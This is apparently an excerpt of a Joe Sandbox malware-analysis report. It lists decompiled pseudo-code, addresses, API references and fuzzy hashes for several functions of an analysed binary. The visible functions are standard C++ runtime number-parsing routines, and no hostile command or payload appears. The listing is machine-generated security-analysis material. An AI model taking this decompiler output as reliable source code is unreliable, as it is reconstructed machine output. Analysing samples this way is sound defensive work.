						 *(_t189 - 0x20) = ( *(_t189 + 8))[ *((intOrPtr*)(_t189 - 0x1c)) + 0x42] & 0x000000ff;
						E004144D0(_t189 - 0x94);
						 *((char*)(_t189 - 4)) = 1;
						 *((char*)(_t189 - 0x94)) = 0 |  *(_t189 - 0x20) != 0x00000000;
						E00404E30(_t189 - 0x40);
						_t63 =  *((intOrPtr*)(_t189 - 0x1c)) + 0x74; // 0x74
						 *((intOrPtr*)(_t189 - 0x64)) = E00413060( &(( *(_t189 + 8))[_t63]));
						 *((intOrPtr*)(_t189 - 0x60)) = 0;
						_t69 =  *((intOrPtr*)(_t189 - 0x1c)) + 0x78; // 0x78
						 *((intOrPtr*)(_t189 - 0x6c)) = E00413060( &(( *(_t189 + 8))[_t69]));
						 *((intOrPtr*)(_t189 - 0x68)) = 0;
						_t75 =  *((intOrPtr*)(_t189 - 0x1c)) + 0x44; // 0x44
						 *((intOrPtr*)(_t189 - 0x5c)) = E00413060( &(( *(_t189 + 8))[_t75]));
						 *((intOrPtr*)(_t189 - 0x58)) = 0;
						_t81 =  *((intOrPtr*)(_t189 - 0x1c)) + 0x48; // 0x48
						 *((intOrPtr*)(_t189 - 0x54)) = E00413060( &(( *(_t189 + 8))[_t81]));
						 *((intOrPtr*)(_t189 - 0x50)) = 0;
						_t87 =  *((intOrPtr*)(_t189 - 0x1c)) + 0x4c; // 0x4c
						 *((intOrPtr*)(_t189 - 0x4c)) = E00413060( &(( *(_t189 + 8))[_t87]));
						 *((intOrPtr*)(_t189 - 0x48)) = 0;
						 *((char*)(_t189 - 0x74)) = 0 |  *(_t189 - 0x20) != 0x00000002;
						if( *(_t189 - 0x20) != 2 &&  *(_t189 - 0x20) != 1 &&  *(_t189 - 0x20) != 5) {
							 *((char*)(_t189 - 0x94)) = 0;
						}
						L17:
						if( *((intOrPtr*)(_t189 - 0x44)) < 1) {
							 *((char*)(_t189 - 0x94)) = 0;
						}
						L19:
						E00418280( *((intOrPtr*)(_t189 - 0x9c)), _t189 - 0x94);
						 *((char*)(_t189 - 4)) = 0;
						E0041E420(_t189 - 0x94);
						 *((intOrPtr*)(_t189 - 4)) = 0xffffffff;
						_t110 = E004034C0(_t189 - 0x40);
						continue;
					} else {
						L3:
						_t171 =  *((intOrPtr*)(_t189 - 0x14));
						if(_t171 <  *((intOrPtr*)(_t189 - 0xa4))) {
							goto L4;
						}
					}
					break;
				}
				L20:
				 *[fs:0x0] =  *((intOrPtr*)(_t189 - 0xc));
				return _t110;
			}

0x0041425f
0x0041425f
0x0041425f
0x00414268
0x0041426b
0x00414278
0x00414280
0x00414285
0x0041428b
0x00414294
0x0041429a
0x00000000
0x00000000
0x004142a0
0x004142a0
0x004142b1
0x004142c5
0x004142c8
0x004142cb
0x004142d5
0x004142da
0x004142e7
0x004142f4
0x004142fb
0x004142fd
0x004142fd
0x00414304
0x0041431f
0x0041431f
0x00414325
0x00414329
0x00414335
0x00000000
0x00000000
0x00414342
0x00414348
0x0041434c
0x0041435c
0x00414319
0x00414319
0x00414363
0x00414370
0x00414378
0x00414382
0x00414382
0x00414390
0x0041439a
0x004143a3
0x004143a8
0x004143b5
0x004143c5
0x004143d0
0x004143df
0x004143e2
0x004143eb
0x004143fa
0x004143fd
0x00414406
0x00414415
0x00414418
0x00414421
0x00414430
0x00414433
0x0041443c
0x0041444b
0x0041444e
0x0041445a
0x00414461
0x0041446f
0x0041446f
0x00414476
0x0041447a
0x0041447c
0x0041447c
0x00414483
0x00414490
0x00414495
0x0041449f
0x004144a4
0x004144ae
0x00000000
0x004142a2
0x004142a2
0x004142a2
0x004142ab
0x00000000
0x00000000
0x004142ab
0x00000000
0x004142a0
0x004144b8
0x004144bb
0x004144c5

APIs

__aulldiv.LIBCMT ref: 00414280

Strings

@, xrefs: 004142FD
, xrefs: 004142CB

Memory Dump Source

Source File: 00000000.00000002.289784623.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.289780882.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289895062.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289910874.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289915647.0000000000466000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_555.jbxd

Similarity

API ID: __aulldiv
String ID: $@
API String ID: 3732870572-1077428164
Opcode ID: d07d332a19cfd8e2cd8069d000f16b0f2e15487d997d424f883b969f276c2d7a
Instruction ID: c6b581ce44189cd6cc21d131d8dfc5a6422e7f712ee49997600eca13124260e1
Opcode Fuzzy Hash: d07d332a19cfd8e2cd8069d000f16b0f2e15487d997d424f883b969f276c2d7a
Instruction Fuzzy Hash: 253128B0E002198FDB54CF94C891BEEB7B1BF85304F208099E559AB281C778AE85CF95

Uniqueness

Uniqueness Score: -1.00%

Function 004445EB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72
COMMON

Download Yara Rule

C-Code - Quality: 71%

			E004445EB(void* __ebx, intOrPtr __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t41;
				void* _t45;
				intOrPtr _t47;
				intOrPtr* _t54;
				signed int* _t57;
				signed int* _t66;
				void* _t70;
				signed int _t71;
				void* _t72;
				void* _t76;

				_t76 = __eflags;
				_push(0x38);
				E00425719(E0044F5EA, __ebx, __edi, __esi);
				_t68 =  *((intOrPtr*)(_t72 + 0x1c));
				_t66 =  *(_t72 + 0x20);
				_t57 =  *(_t72 + 0x24);
				 *(_t72 - 0x38) =  *(_t72 - 0x38) & 0x00000000;
				 *((intOrPtr*)(_t72 - 0x40)) =  *((intOrPtr*)(_t72 + 8));
				 *((intOrPtr*)(_t72 - 0x34)) = __ecx;
				_t41 = E004013A0(_t72 - 0x3c);
				 *(_t72 - 4) =  *(_t72 - 4) & 0x00000000;
				_push(_t41);
				_push( *((intOrPtr*)( *((intOrPtr*)(_t72 + 0x1c)) + 0x14)));
				_push(_t72 + 0x14);
				_push(_t72 + 0xc);
				_push(_t72 - 0x30);
				_push( *((intOrPtr*)(_t72 - 0x34)));
				_t45 = E004427E0(_t57, _t68, __edx, _t66,  *((intOrPtr*)( *((intOrPtr*)(_t72 + 0x1c)) + 0x14)), _t76);
				 *(_t72 - 4) =  *(_t72 - 4) | 0xffffffff;
				_t70 = _t45;
				E004012D0();
				_t47 = _t72 - 0x2f;
				if( *((char*)(_t72 - 0x30)) != 0x2d) {
					_t47 = _t72 - 0x30;
				}
				 *((intOrPtr*)(_t72 - 0x34)) = _t47;
				_t71 = E0044BA5A( *((intOrPtr*)(_t72 - 0x34)), _t72 - 0x44, _t70, _t72 - 0x38);
				if(E0043C897(_t72 + 0xc, _t72 + 0x14) != 0) {
					 *_t66 =  *_t66 | 0x00000001;
				}
				if( *((intOrPtr*)(_t72 - 0x44)) ==  *((intOrPtr*)(_t72 - 0x34)) ||  *(_t72 - 0x38) != 0 || _t71 > 0xffff) {
					 *_t66 =  *_t66 | 0x00000002;
					__eflags =  *_t66;
				} else {
					if( *((char*)(_t72 - 0x30)) == 0x2d) {
						_t71 =  ~_t71;
					}
					 *_t57 = _t71;
				}
				_t54 =  *((intOrPtr*)(_t72 - 0x40));
				 *_t54 =  *((intOrPtr*)(_t72 + 0xc));
				 *((intOrPtr*)(_t54 + 4)) =  *((intOrPtr*)(_t72 + 0x10));
				return E00425763(_t57, _t66, _t71);
			}

0x004445eb
0x004445eb
0x004445f2
0x004445fa
0x004445fd
0x00444600
0x00444603
0x00444607
0x0044460d
0x00444613
0x0044461b
0x0044461f
0x00444620
0x00444624
0x00444628
0x0044462c
0x0044462d
0x00444630
0x00444635
0x0044463f
0x00444641
0x0044464a
0x0044464d
0x0044464f
0x0044464f
0x00444652
0x00444666
0x00444679
0x0044467b
0x0044467b
0x00444684
0x004446a1
0x004446a1
0x00444694
0x00444698
0x0044469a
0x0044469a
0x0044469c
0x0044469c
0x004446a7
0x004446aa
0x004446af
0x004446b7

APIs

__EH_prolog3_GS.LIBCMT ref: 004445F2

Part of subcall function 004013A0: std::_Lockit::_Lockit.LIBCPMT ref: 004013BC

Part of subcall function 004427E0: __EH_prolog3_GS.LIBCMT ref: 004427E7
Part of subcall function 004427E0: _Maklocchr.LIBCPMT ref: 00442837
Part of subcall function 004427E0: _Maklocchr.LIBCPMT ref: 0044286D
Part of subcall function 004427E0: _Maklocchr.LIBCPMT ref: 0044294E

Part of subcall function 004012D0: std::_Lockit::_Lockit.LIBCPMT ref: 004012DE

__Stoulx.LIBCPMT ref: 00444661

Strings

-, xrefs: 00444694

Memory Dump Source

Source File: 00000000.00000002.289784623.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.289780882.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289895062.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289910874.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289915647.0000000000466000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_555.jbxd

Similarity

API ID: Maklocchr$H_prolog3_LockitLockit::_std::_$Stoulx
String ID: -
API String ID: 3481870756-2547889144
Opcode ID: 3aa943fd16ca49a5fc33c2af1b052e47d129eb3797f40fbcfcb0d65a500ece52
Instruction ID: 267a4944b206e1e9b425bb3712da286d34f7e2a9ed32ae55697172843aa23068
Opcode Fuzzy Hash: 3aa943fd16ca49a5fc33c2af1b052e47d129eb3797f40fbcfcb0d65a500ece52
Instruction Fuzzy Hash: B73126B2801218ABEF10DF90E981AEEBBB8EF45314F55416BF811B7290D738AE15CB55

Uniqueness

Uniqueness Score: -1.00%

Function 004446BA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72
COMMON

Download Yara Rule

C-Code - Quality: 71%

			E004446BA(void* __ebx, intOrPtr __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t41;
				void* _t45;
				intOrPtr _t47;
				intOrPtr* _t54;
				signed int* _t57;
				signed int* _t66;
				void* _t70;
				signed int _t71;
				void* _t72;
				void* _t76;

				_t76 = __eflags;
				_push(0x38);
				E00425719(E0044F5EA, __ebx, __edi, __esi);
				_t68 =  *((intOrPtr*)(_t72 + 0x1c));
				_t66 =  *(_t72 + 0x20);
				_t57 =  *(_t72 + 0x24);
				 *(_t72 - 0x38) =  *(_t72 - 0x38) & 0x00000000;
				 *((intOrPtr*)(_t72 - 0x40)) =  *((intOrPtr*)(_t72 + 8));
				 *((intOrPtr*)(_t72 - 0x34)) = __ecx;
				_t41 = E004013A0(_t72 - 0x3c);
				 *(_t72 - 4) =  *(_t72 - 4) & 0x00000000;
				_push(_t41);
				_push( *((intOrPtr*)( *((intOrPtr*)(_t72 + 0x1c)) + 0x14)));
				_push(_t72 + 0x14);
				_push(_t72 + 0xc);
				_push(_t72 - 0x30);
				_push( *((intOrPtr*)(_t72 - 0x34)));
				_t45 = E004427E0(_t57, _t68, __edx, _t66,  *((intOrPtr*)( *((intOrPtr*)(_t72 + 0x1c)) + 0x14)), _t76);
				 *(_t72 - 4) =  *(_t72 - 4) | 0xffffffff;
				_t70 = _t45;
				E004012D0();
				_t47 = _t72 - 0x2f;
				if( *((char*)(_t72 - 0x30)) != 0x2d) {
					_t47 = _t72 - 0x30;
				}
				 *((intOrPtr*)(_t72 - 0x34)) = _t47;
				_t71 = E0044BA5A( *((intOrPtr*)(_t72 - 0x34)), _t72 - 0x44, _t70, _t72 - 0x38);
				if(E0043C897(_t72 + 0xc, _t72 + 0x14) != 0) {
					 *_t66 =  *_t66 | 0x00000001;
				}
				if( *((intOrPtr*)(_t72 - 0x44)) ==  *((intOrPtr*)(_t72 - 0x34)) ||  *(_t72 - 0x38) != 0 || _t71 > 0xffffffff) {
					 *_t66 =  *_t66 | 0x00000002;
					__eflags =  *_t66;
				} else {
					if( *((char*)(_t72 - 0x30)) == 0x2d) {
						_t71 =  ~_t71;
					}
					 *_t57 = _t71;
				}
				_t54 =  *((intOrPtr*)(_t72 - 0x40));
				 *_t54 =  *((intOrPtr*)(_t72 + 0xc));
				 *((intOrPtr*)(_t54 + 4)) =  *((intOrPtr*)(_t72 + 0x10));
				return E00425763(_t57, _t66, _t71);
			}

0x004446ba
0x004446ba
0x004446c1
0x004446c9
0x004446cc
0x004446cf
0x004446d2
0x004446d6
0x004446dc
0x004446e2
0x004446ea
0x004446ee
0x004446ef
0x004446f3
0x004446f7
0x004446fb
0x004446fc
0x004446ff
0x00444704
0x0044470e
0x00444710
0x00444719
0x0044471c
0x0044471e
0x0044471e
0x00444721
0x00444735
0x00444748
0x0044474a
0x0044474a
0x00444753
0x0044476c
0x0044476c
0x00444760
0x00444764
0x00444766
0x00444766
0x00444768
0x00444768
0x00444772
0x00444775
0x0044477a
0x00444782

APIs

__EH_prolog3_GS.LIBCMT ref: 004446C1

Part of subcall function 004013A0: std::_Lockit::_Lockit.LIBCPMT ref: 004013BC

Part of subcall function 004427E0: __EH_prolog3_GS.LIBCMT ref: 004427E7
Part of subcall function 004427E0: _Maklocchr.LIBCPMT ref: 00442837
Part of subcall function 004427E0: _Maklocchr.LIBCPMT ref: 0044286D
Part of subcall function 004427E0: _Maklocchr.LIBCPMT ref: 0044294E

Part of subcall function 004012D0: std::_Lockit::_Lockit.LIBCPMT ref: 004012DE

__Stoulx.LIBCPMT ref: 00444730

Strings

-, xrefs: 00444760

Memory Dump Source

Source File: 00000000.00000002.289784623.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.289780882.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289895062.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289910874.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289915647.0000000000466000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_555.jbxd

Similarity

API ID: Maklocchr$H_prolog3_LockitLockit::_std::_$Stoulx
String ID: -
API String ID: 3481870756-2547889144
Opcode ID: a91be7942829320f7921ef42bc8d348bcfd99765ab6414da01f0868a731490cc
Instruction ID: d1ad634b223e0f1ec86fc1b79099c60cdefcd5176266a4b842573902821c486a
Opcode Fuzzy Hash: a91be7942829320f7921ef42bc8d348bcfd99765ab6414da01f0868a731490cc
Instruction Fuzzy Hash: B3312571801218AFEF11EF90E981ADEBBB9FF45324F14416BF811A7290D738AE15CB54

Uniqueness

Uniqueness Score: -1.00%

Function 00443922 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72
COMMON

Download Yara Rule

C-Code - Quality: 71%

			E00443922(void* __ebx, intOrPtr __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t41;
				void* _t45;
				intOrPtr _t47;
				intOrPtr* _t54;
				signed int* _t57;
				signed int* _t66;
				void* _t70;
				signed int _t71;
				void* _t72;
				void* _t76;

				_t76 = __eflags;
				_push(0x38);
				E00425719(E0044F5EA, __ebx, __edi, __esi);
				_t68 =  *((intOrPtr*)(_t72 + 0x1c));
				_t66 =  *(_t72 + 0x20);
				_t57 =  *(_t72 + 0x24);
				 *(_t72 - 0x38) =  *(_t72 - 0x38) & 0x00000000;
				 *((intOrPtr*)(_t72 - 0x40)) =  *((intOrPtr*)(_t72 + 8));
				 *((intOrPtr*)(_t72 - 0x34)) = __ecx;
				_t41 = E004013A0(_t72 - 0x3c);
				 *(_t72 - 4) =  *(_t72 - 4) & 0x00000000;
				_push(_t41);
				_push( *((intOrPtr*)( *((intOrPtr*)(_t72 + 0x1c)) + 0x14)));
				_push(_t72 + 0x14);
				_push(_t72 + 0xc);
				_push(_t72 - 0x30);
				_push( *((intOrPtr*)(_t72 - 0x34)));
				_t45 = E00441905(_t57, _t68, __edx, _t66,  *((intOrPtr*)( *((intOrPtr*)(_t72 + 0x1c)) + 0x14)), _t76);
				 *(_t72 - 4) =  *(_t72 - 4) | 0xffffffff;
				_t70 = _t45;
				E004012D0();
				_t47 = _t72 - 0x2f;
				if( *((char*)(_t72 - 0x30)) != 0x2d) {
					_t47 = _t72 - 0x30;
				}
				 *((intOrPtr*)(_t72 - 0x34)) = _t47;
				_t71 = E0044BA5A( *((intOrPtr*)(_t72 - 0x34)), _t72 - 0x44, _t70, _t72 - 0x38);
				if(E0043C897(_t72 + 0xc, _t72 + 0x14) != 0) {
					 *_t66 =  *_t66 | 0x00000001;
				}
				if( *((intOrPtr*)(_t72 - 0x44)) ==  *((intOrPtr*)(_t72 - 0x34)) ||  *(_t72 - 0x38) != 0 || _t71 > 0xffff) {
					 *_t66 =  *_t66 | 0x00000002;
					__eflags =  *_t66;
				} else {
					if( *((char*)(_t72 - 0x30)) == 0x2d) {
						_t71 =  ~_t71;
					}
					 *_t57 = _t71;
				}
				_t54 =  *((intOrPtr*)(_t72 - 0x40));
				 *_t54 =  *((intOrPtr*)(_t72 + 0xc));
				 *((intOrPtr*)(_t54 + 4)) =  *((intOrPtr*)(_t72 + 0x10));
				return E00425763(_t57, _t66, _t71);
			}

0x00443922
0x00443922
0x00443929
0x00443931
0x00443934
0x00443937
0x0044393a
0x0044393e
0x00443944
0x0044394a
0x00443952
0x00443956
0x00443957
0x0044395b
0x0044395f
0x00443963
0x00443964
0x00443967
0x0044396c
0x00443976
0x00443978
0x00443981
0x00443984
0x00443986
0x00443986
0x00443989
0x0044399d
0x004439b0
0x004439b2
0x004439b2
0x004439bb
0x004439d8
0x004439d8
0x004439cb
0x004439cf
0x004439d1
0x004439d1
0x004439d3
0x004439d3
0x004439de
0x004439e1
0x004439e6
0x004439ee

APIs

__EH_prolog3_GS.LIBCMT ref: 00443929

Part of subcall function 004013A0: std::_Lockit::_Lockit.LIBCPMT ref: 004013BC

Part of subcall function 00441905: __EH_prolog3_GS.LIBCMT ref: 0044190C
Part of subcall function 00441905: _Maklocchr.LIBCPMT ref: 0044195C
Part of subcall function 00441905: _Maklocchr.LIBCPMT ref: 00441992
Part of subcall function 00441905: _Maklocchr.LIBCPMT ref: 00441A73

Part of subcall function 004012D0: std::_Lockit::_Lockit.LIBCPMT ref: 004012DE

__Stoulx.LIBCPMT ref: 00443998

Strings

-, xrefs: 004439CB

Memory Dump Source

Source File: 00000000.00000002.289784623.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.289780882.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289895062.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289910874.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289915647.0000000000466000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_555.jbxd

Similarity

API ID: Maklocchr$H_prolog3_LockitLockit::_std::_$Stoulx
String ID: -
API String ID: 3481870756-2547889144
Opcode ID: 47d493d92f3be744b299b4afb32907013a27eb34b802e5155a3a49bb4394e6c1
Instruction ID: 6d10ba98eb63c471794d0c6913b26a607c93d79f779fb8e2c7b3c1566483ed81
Opcode Fuzzy Hash: 47d493d92f3be744b299b4afb32907013a27eb34b802e5155a3a49bb4394e6c1
Instruction Fuzzy Hash: BC3128B190121DABEF15DF90D981AEEBBB8FF04315F14416BF801A7251E778AE04CB55

Uniqueness

Uniqueness Score: -1.00%

Function 004439F1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72
COMMON

Download Yara Rule

C-Code - Quality: 71%

			E004439F1(void* __ebx, intOrPtr __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t41;
				void* _t45;
				intOrPtr _t47;
				intOrPtr* _t54;
				signed int* _t57;
				signed int* _t66;
				void* _t70;
				signed int _t71;
				void* _t72;
				void* _t76;

				_t76 = __eflags;
				_push(0x38);
				E00425719(E0044F5EA, __ebx, __edi, __esi);
				_t68 =  *((intOrPtr*)(_t72 + 0x1c));
				_t66 =  *(_t72 + 0x20);
				_t57 =  *(_t72 + 0x24);
				 *(_t72 - 0x38) =  *(_t72 - 0x38) & 0x00000000;
				 *((intOrPtr*)(_t72 - 0x40)) =  *((intOrPtr*)(_t72 + 8));
				 *((intOrPtr*)(_t72 - 0x34)) = __ecx;
				_t41 = E004013A0(_t72 - 0x3c);
				 *(_t72 - 4) =  *(_t72 - 4) & 0x00000000;
				_push(_t41);
				_push( *((intOrPtr*)( *((intOrPtr*)(_t72 + 0x1c)) + 0x14)));
				_push(_t72 + 0x14);
				_push(_t72 + 0xc);
				_push(_t72 - 0x30);
				_push( *((intOrPtr*)(_t72 - 0x34)));
				_t45 = E00441905(_t57, _t68, __edx, _t66,  *((intOrPtr*)( *((intOrPtr*)(_t72 + 0x1c)) + 0x14)), _t76);
				 *(_t72 - 4) =  *(_t72 - 4) | 0xffffffff;
				_t70 = _t45;
				E004012D0();
				_t47 = _t72 - 0x2f;
				if( *((char*)(_t72 - 0x30)) != 0x2d) {
					_t47 = _t72 - 0x30;
				}
				 *((intOrPtr*)(_t72 - 0x34)) = _t47;
				_t71 = E0044BA5A( *((intOrPtr*)(_t72 - 0x34)), _t72 - 0x44, _t70, _t72 - 0x38);
				if(E0043C897(_t72 + 0xc, _t72 + 0x14) != 0) {
					 *_t66 =  *_t66 | 0x00000001;
				}
				if( *((intOrPtr*)(_t72 - 0x44)) ==  *((intOrPtr*)(_t72 - 0x34)) ||  *(_t72 - 0x38) != 0 || _t71 > 0xffffffff) {
					 *_t66 =  *_t66 | 0x00000002;
					__eflags =  *_t66;
				} else {
					if( *((char*)(_t72 - 0x30)) == 0x2d) {
						_t71 =  ~_t71;
					}
					 *_t57 = _t71;
				}
				_t54 =  *((intOrPtr*)(_t72 - 0x40));
				 *_t54 =  *((intOrPtr*)(_t72 + 0xc));
				 *((intOrPtr*)(_t54 + 4)) =  *((intOrPtr*)(_t72 + 0x10));
				return E00425763(_t57, _t66, _t71);
			}

0x004439f1
0x004439f1
0x004439f8
0x00443a00
0x00443a03
0x00443a06
0x00443a09
0x00443a0d
0x00443a13
0x00443a19
0x00443a21
0x00443a25
0x00443a26
0x00443a2a
0x00443a2e
0x00443a32
0x00443a33
0x00443a36
0x00443a3b
0x00443a45
0x00443a47
0x00443a50
0x00443a53
0x00443a55
0x00443a55
0x00443a58
0x00443a6c
0x00443a7f
0x00443a81
0x00443a81
0x00443a8a
0x00443aa3
0x00443aa3
0x00443a97
0x00443a9b
0x00443a9d
0x00443a9d
0x00443a9f
0x00443a9f
0x00443aa9
0x00443aac
0x00443ab1
0x00443ab9

APIs

__EH_prolog3_GS.LIBCMT ref: 004439F8

Part of subcall function 004013A0: std::_Lockit::_Lockit.LIBCPMT ref: 004013BC

Part of subcall function 00441905: __EH_prolog3_GS.LIBCMT ref: 0044190C
Part of subcall function 00441905: _Maklocchr.LIBCPMT ref: 0044195C
Part of subcall function 00441905: _Maklocchr.LIBCPMT ref: 00441992
Part of subcall function 00441905: _Maklocchr.LIBCPMT ref: 00441A73

Part of subcall function 004012D0: std::_Lockit::_Lockit.LIBCPMT ref: 004012DE

__Stoulx.LIBCPMT ref: 00443A67

Strings

-, xrefs: 00443A97

Memory Dump Source

Source File: 00000000.00000002.289784623.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.289780882.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289895062.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289910874.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289915647.0000000000466000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_555.jbxd

Similarity

API ID: Maklocchr$H_prolog3_LockitLockit::_std::_$Stoulx
String ID: -
API String ID: 3481870756-2547889144
Opcode ID: e524f953dea8ac674451661f132e77a4d5392abb4cf70e53956bc6b3af098d5d
Instruction ID: 0444aa679b813feaadee55417358232df1fe5f523a3454d155d46e08a6d21acf
Opcode Fuzzy Hash: e524f953dea8ac674451661f132e77a4d5392abb4cf70e53956bc6b3af098d5d
Instruction Fuzzy Hash: E63126B2901218AFEF15EF90D981ADEBBB8EF04315F14426BF851B7290D738AE05CB55

Uniqueness

Uniqueness Score: -1.00%

Function 0043AA6F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72
COMMON

Download Yara Rule

C-Code - Quality: 69%

			E0043AA6F(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
				void* _t41;
				void* _t45;
				intOrPtr _t47;
				intOrPtr* _t54;
				signed int* _t57;
				signed int* _t65;
				void* _t69;
				signed int _t70;
				void* _t71;
				void* _t75;

				_t75 = __eflags;
				_push(0x38);
				E00425719(E0044F5EA, __ebx, __edi, __esi);
				_t65 =  *(_t71 + 0x20);
				_t57 =  *(_t71 + 0x24);
				 *(_t71 - 0x38) =  *(_t71 - 0x38) & 0x00000000;
				 *((intOrPtr*)(_t71 - 0x40)) =  *((intOrPtr*)(_t71 + 8));
				 *((intOrPtr*)(_t71 - 0x34)) = __ecx;
				_t41 = E004013A0(_t71 - 0x3c);
				 *(_t71 - 4) =  *(_t71 - 4) & 0x00000000;
				_push(_t41);
				_push( *((intOrPtr*)( *((intOrPtr*)(_t71 + 0x1c)) + 0x14)));
				_push(_t71 + 0x14);
				_push(_t71 + 0xc);
				_push(_t71 - 0x30);
				_push( *((intOrPtr*)(_t71 - 0x34)));
				_t45 = E0043A01B(_t57, _t65,  *((intOrPtr*)( *((intOrPtr*)(_t71 + 0x1c)) + 0x14)), _t75);
				 *(_t71 - 4) =  *(_t71 - 4) | 0xffffffff;
				_t69 = _t45;
				E004012D0();
				_t47 = _t71 - 0x2f;
				if( *((char*)(_t71 - 0x30)) != 0x2d) {
					_t47 = _t71 - 0x30;
				}
				 *((intOrPtr*)(_t71 - 0x34)) = _t47;
				_t70 = E0044BA5A( *((intOrPtr*)(_t71 - 0x34)), _t71 - 0x44, _t69, _t71 - 0x38);
				if(E00439B42(_t71 + 0xc, _t71 + 0x14) != 0) {
					 *_t65 =  *_t65 | 0x00000001;
				}
				if( *((intOrPtr*)(_t71 - 0x44)) ==  *((intOrPtr*)(_t71 - 0x34)) ||  *(_t71 - 0x38) != 0 || _t70 > 0xffff) {
					 *_t65 =  *_t65 | 0x00000002;
					__eflags =  *_t65;
				} else {
					if( *((char*)(_t71 - 0x30)) == 0x2d) {
						_t70 =  ~_t70;
					}
					 *_t57 = _t70;
				}
				_t54 =  *((intOrPtr*)(_t71 - 0x40));
				 *_t54 =  *((intOrPtr*)(_t71 + 0xc));
				 *((intOrPtr*)(_t54 + 4)) =  *((intOrPtr*)(_t71 + 0x10));
				return E00425763(_t57, _t65, _t70);
			}

0x0043aa6f
0x0043aa6f
0x0043aa76
0x0043aa81
0x0043aa84
0x0043aa87
0x0043aa8b
0x0043aa91
0x0043aa97
0x0043aa9f
0x0043aaa3
0x0043aaa4
0x0043aaa8
0x0043aaac
0x0043aab0
0x0043aab1
0x0043aab4
0x0043aab9
0x0043aac3
0x0043aac5
0x0043aace
0x0043aad1
0x0043aad3
0x0043aad3
0x0043aad6
0x0043aaea
0x0043aafd
0x0043aaff
0x0043aaff
0x0043ab08
0x0043ab25
0x0043ab25
0x0043ab18
0x0043ab1c
0x0043ab1e
0x0043ab1e
0x0043ab20
0x0043ab20
0x0043ab2b
0x0043ab2e
0x0043ab33
0x0043ab3b

APIs

__EH_prolog3_GS.LIBCMT ref: 0043AA76

Part of subcall function 004013A0: std::_Lockit::_Lockit.LIBCPMT ref: 004013BC

Part of subcall function 0043A01B: __EH_prolog3_GS.LIBCMT ref: 0043A022

Part of subcall function 004012D0: std::_Lockit::_Lockit.LIBCPMT ref: 004012DE

__Stoulx.LIBCPMT ref: 0043AAE5

Strings

-, xrefs: 0043AB18

Memory Dump Source

Source File: 00000000.00000002.289784623.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.289780882.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289895062.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289910874.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289915647.0000000000466000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_555.jbxd

Similarity

API ID: H_prolog3_LockitLockit::_std::_$Stoulx
String ID: -
API String ID: 601206080-2547889144
Opcode ID: 286989366fbb4e55d19dd4f6f3fbd73358116faa7c54de17407c90688854926e
Instruction ID: 55d813f80fcfad40f73a1bc3020a12753efb73c574cf4924440604b9993ba6d0
Opcode Fuzzy Hash: 286989366fbb4e55d19dd4f6f3fbd73358116faa7c54de17407c90688854926e
Instruction Fuzzy Hash: FD312572801218AFDF14DF90E981AEEB7B9FF08314F14416BF951A7290D738AE14CB55

Uniqueness

Uniqueness Score: -1.00%

Function 0043AB3E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72
COMMON

Download Yara Rule

C-Code - Quality: 69%

